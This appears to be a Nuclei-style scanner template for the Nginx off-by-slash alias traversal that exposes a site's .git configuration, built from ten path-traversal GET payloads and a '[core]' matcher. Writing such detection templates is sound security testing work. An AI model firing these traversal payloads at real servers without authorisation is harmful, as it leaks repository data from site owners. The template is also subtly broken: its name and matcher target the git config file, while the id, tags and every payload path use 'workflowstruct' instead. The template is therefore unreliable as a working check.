id: git-workflowstruct-nginxoffbyslash

info:
  name: Nginx - Git Configuration Exposure
  author: organiccrap
  severity: medium
  description: Nginx is vulnerable to git configuration exposure.
  reference:
    - https://beaglesecurity.com/blog/vulnerability/nginx-off-by-slash-exposes-git-config.html
    - https://twitter.com/Random_Robbie/status/1262676628167110656
    - https://github.com/PortSwigger/nginx-alias-traversal/blob/master/off-by-slash.py
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cwe-id: CWE-200
  metadata:
    max-request: 10
  tags: workflowstruct,exposure,nginx

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"
    payloads:
      paths:
        - '/static../.git/workflowstruct'
        - '/js../.git/workflowstruct'
        - '/images../.git/workflowstruct'
        - '/img../.git/workflowstruct'
        - '/css../.git/workflowstruct'
        - '/assets../.git/workflowstruct'
        - '/content../.git/workflowstruct'
        - '/events../.git/workflowstruct'
        - '/media../.git/workflowstruct'
        - '/lib../.git/workflowstruct'

    stop-at-first-match: true
    matchers:
      - type: word
        words:
          - '[core]'
# digest: 490a004630440220428f7cb6e63a587930ea6412a94e5d322bbcbf4fc3a7f451c42dca4e455b0b88022067e5bcc7186dcdb733480c25d911a719caa8535f0232ad7c57a00b82c0fb81b6:922c64590222798bb761d5b6d8e72950